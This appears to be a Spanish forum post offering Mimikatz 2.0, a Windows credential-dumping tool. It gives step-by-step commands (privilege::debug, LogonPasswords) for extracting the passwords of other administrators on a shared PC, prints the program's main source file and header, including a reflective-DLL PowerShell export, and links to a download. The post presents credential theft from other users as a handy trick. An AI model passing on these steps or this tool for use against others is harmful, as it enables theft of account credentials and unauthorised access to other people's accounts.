Mimikatz 2.0
Descifra contraseñas en Windows
Mimikatz es un programa de un desarrollador fracés apodado Gentil Kiwi que nos servirá para descifrar las contraseñas de los administradores de un PC con Windows, algo que puede ser muy útil cuando compartes un ordenador y no eres el único administrador.
Funcionamiento:
Ejecutamos Mimikatz como administrador.
Primero escribimos privilege::debug y presionamos Enter, después escribimos minidump y presionamos Enter, a continuación escribimos LogonPasswords y presionamos Enter y nos aparecerán la(s) contraseñas.
Codigo Fuente
mimikatz.c
Código:
/* Benjamin DELPY `gentilkiwi`
http://blog.gentilkiwi.com
benjamin@gentilkiwi.com
Licence : https://creativecommons.org/licenses/by/4.0/
*/
#include "mimikatz.h"
const KUHL_M * mimikatz_modules[] = {
&kuhl_m_standard,
&kuhl_m_crypto,
&kuhl_m_sekurlsa,
&kuhl_m_kerberos,
&kuhl_m_privilege,
&kuhl_m_process,
&kuhl_m_service,
&kuhl_m_lsadump,
&kuhl_m_ts,
&kuhl_m_event,
&kuhl_m_misc,
&kuhl_m_token,
&kuhl_m_vault,
&kuhl_m_minesweeper,
#ifdef NET_MODULE
&kuhl_m_net,
#endif
&kuhl_m_dpapi,
};
int wmain(int argc, wchar_t * argv[])
{
int i, status = STATUS_SUCCESS;
#ifndef _WINDLL
size_t len;
wchar_t input[0xffff];
kull_m_output_init();
SetConsoleTitle(MIMIKATZ L" " MIMIKATZ_VERSION L" " MIMIKATZ_ARCH L" (oe.eo)");
SetConsoleCtrlHandler(HandlerRoutine, TRUE);
#endif
kprintf(L"\n"
L" .#####. " MIMIKATZ_FULL L"\n"
L" .## ^ ##. \n"
L" ## / \\ ## /* * *\n"
L" ## \\ / ## Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )\n"
L" '## v ##' http://blog.gentilkiwi.com/mimikatz (oe.eo)\n"
L" '#####' " MIMIKATZ_SPECIAL L" with %2u modules * * */\n\n", ARRAYSIZE(mimikatz_modules));
mimikatz_initOrClean(TRUE);
for(i = MIMIKATZ_AUTO_COMMAND_START ; (i < argc) && (status != STATUS_FATAL_APP_EXIT) ; i++)
{
kprintf(L"\n" MIMIKATZ L"(" MIMIKATZ_AUTO_COMMAND_STRING L") # %s\n", argv[i]);
status = mimikatz_dispatchCommand(argv[i]);
}
#ifndef _WINDLL
while (status != STATUS_FATAL_APP_EXIT)
{
kprintf(L"\n" MIMIKATZ L" # "); fflush(stdin);
if(fgetws(input, ARRAYSIZE(input), stdin) && (len = wcslen(input)) && (input[0] != L'\n'))
{
if(input[len - 1] == L'\n')
input[len - 1] = L'\0';
kprintf_inputline(L"%s\n", input);
status = mimikatz_dispatchCommand(input);
}
}
#endif
mimikatz_initOrClean(FALSE);
#ifndef _WINDLL
kull_m_output_clean();
#endif
return STATUS_SUCCESS;
}
BOOL WINAPI HandlerRoutine(DWORD dwCtrlType)
{
mimikatz_initOrClean(FALSE);
return FALSE;
}
NTSTATUS mimikatz_initOrClean(BOOL Init)
{
unsigned short indexModule;
PKUHL_M_C_FUNC_INIT function;
long offsetToFunc;
NTSTATUS fStatus;
if(Init)
{
RtlGetNtVersionNumbers(&MIMIKATZ_NT_MAJOR_VERSION, &MIMIKATZ_NT_MINOR_VERSION, &MIMIKATZ_NT_BUILD_NUMBER);
MIMIKATZ_NT_BUILD_NUMBER &= 0x00003fff;
offsetToFunc = FIELD_OFFSET(KUHL_M, pInit);
kull_m_busylight_start();
}
else
offsetToFunc = FIELD_OFFSET(KUHL_M, pClean);
for(indexModule = 0; indexModule < ARRAYSIZE(mimikatz_modules); indexModule++)
{
if(function = *(PKUHL_M_C_FUNC_INIT *) ((ULONG_PTR) (mimikatz_modules[indexModule]) + offsetToFunc))
{
fStatus = function();
if(!NT_SUCCESS(fStatus))
kprintf(L">>> %s of \'%s\' module failed : %08x\n", (Init ? L"INIT" : L"CLEAN"), mimikatz_modules[indexModule]->shortName, fStatus);
}
}
if(!Init)
{
kull_m_busylight_stop();
kull_m_output_file(NULL);
}
return STATUS_SUCCESS;
}
NTSTATUS mimikatz_dispatchCommand(wchar_t * input)
{
NTSTATUS status;
switch(input[0])
{
case L'!':
status = kuhl_m_kernel_do(input + 1);
break;
default:
status = mimikatz_doLocal(input);
}
return status;
}
NTSTATUS mimikatz_doLocal(wchar_t * input)
{
NTSTATUS status = STATUS_SUCCESS;
int argc;
wchar_t ** argv = CommandLineToArgvW(input, &argc), *module = NULL, *command = NULL, *match;
unsigned short indexModule, indexCommand;
BOOL moduleFound = FALSE, commandFound = FALSE;
if(argv && (argc > 0))
{
if(match = wcsstr(argv[0], L"::"))
{
if(module = (wchar_t *) LocalAlloc(LPTR, (match - argv[0] + 1) * sizeof(wchar_t)))
{
if((unsigned int) (match + 2 - argv[0]) < wcslen(argv[0]))
command = match + 2;
RtlCopyMemory(module, argv[0], (match - argv[0]) * sizeof(wchar_t));
}
}
else command = argv[0];
for(indexModule = 0; !moduleFound && (indexModule < ARRAYSIZE(mimikatz_modules)); indexModule++)
if(moduleFound = (!module || (_wcsicmp(module, mimikatz_modules[indexModule]->shortName) == 0)))
if(command)
for(indexCommand = 0; !commandFound && (indexCommand < mimikatz_modules[indexModule]->nbCommands); indexCommand++)
if(commandFound = _wcsicmp(command, mimikatz_modules[indexModule]->commands[indexCommand].command) == 0)
status = mimikatz_modules[indexModule]->commands[indexCommand].pCommand(argc - 1, argv + 1);
if(!moduleFound)
{
PRINT_ERROR(L"\"%s\" module not found !\n", module);
for(indexModule = 0; indexModule < ARRAYSIZE(mimikatz_modules); indexModule++)
{
kprintf(L"\n%16s", mimikatz_modules[indexModule]->shortName);
if(mimikatz_modules[indexModule]->fullName)
kprintf(L" - %s", mimikatz_modules[indexModule]->fullName);
if(mimikatz_modules[indexModule]->description)
kprintf(L" [%s]", mimikatz_modules[indexModule]->description);
}
kprintf(L"\n");
}
else if(!commandFound)
{
indexModule -= 1;
PRINT_ERROR(L"\"%s\" command of \"%s\" module not found !\n", command, mimikatz_modules[indexModule]->shortName);
kprintf(L"\nModule :\t%s", mimikatz_modules[indexModule]->shortName);
if(mimikatz_modules[indexModule]->fullName)
kprintf(L"\nFull name :\t%s", mimikatz_modules[indexModule]->fullName);
if(mimikatz_modules[indexModule]->description)
kprintf(L"\nDescription :\t%s", mimikatz_modules[indexModule]->description);
kprintf(L"\n");
for(indexCommand = 0; indexCommand < mimikatz_modules[indexModule]->nbCommands; indexCommand++)
{
kprintf(L"\n%16s", mimikatz_modules[indexModule]->commands[indexCommand].command);
if(mimikatz_modules[indexModule]->commands[indexCommand].description)
kprintf(L" - %s", mimikatz_modules[indexModule]->commands[indexCommand].description);
}
kprintf(L"\n");
}
if(module)
LocalFree(module);
LocalFree(argv);
}
return status;
}
#ifdef _WINDLL
__declspec(dllexport) wchar_t * powershell_reflective_mimikatz(LPCWSTR input)
{
int argc = 0;
wchar_t ** argv;
if(argv = CommandLineToArgvW(input, &argc))
{
outputBufferElements = 0xff;
outputBufferElementsPosition = 0;
if(outputBuffer = (wchar_t *) LocalAlloc(LPTR, outputBufferElements))
wmain(argc, argv);
LocalFree(argv);
}
return outputBuffer;
}
#endifCódigo:
/* Benjamin DELPY `gentilkiwi`
http://blog.gentilkiwi.com
benjamin@gentilkiwi.com
Licence : https://creativecommons.org/licenses/by/4.0/
*/
#pragma once
#include "globals.h"
#include "modules/kuhl_m_standard.h"
#include "modules/kuhl_m_crypto.h"
#include "modules/sekurlsa/kuhl_m_sekurlsa.h"
#include "modules/kerberos/kuhl_m_kerberos.h"
#include "modules/kuhl_m_process.h"
#include "modules/kuhl_m_service.h"
#include "modules/kuhl_m_privilege.h"
#include "modules/kuhl_m_lsadump.h"
#include "modules/kuhl_m_ts.h"
#include "modules/kuhl_m_event.h"
#include "modules/kuhl_m_misc.h"
#include "modules/kuhl_m_token.h"
#include "modules/kuhl_m_vault.h"
#include "modules/kuhl_m_minesweeper.h"
#ifdef NET_MODULE
#include "modules/kuhl_m_net.h"
#endif
#include "modules/dpapi/kuhl_m_dpapi.h"
#include "modules/kuhl_m_kernel.h"
#include "../modules/kull_m_busylight.h"
#include <io.h>
#include <fcntl.h>
extern VOID WINAPI RtlGetNtVersionNumbers(LPDWORD pMajor, LPDWORD pMinor, LPDWORD pBuild);
int wmain(int argc, wchar_t * argv[]);
BOOL WINAPI HandlerRoutine(DWORD dwCtrlType);
NTSTATUS mimikatz_initOrClean();
NTSTATUS mimikatz_doLocal(wchar_t * input);
NTSTATUS mimikatz_dispatchCommand(wchar_t * input);
#ifdef _WINDLL
__declspec(dllexport) wchar_t * powershell_reflective_mimikatz(LPCWSTR input);
#endif
uploaded.net - [code] Mimikatz 2.0 alpha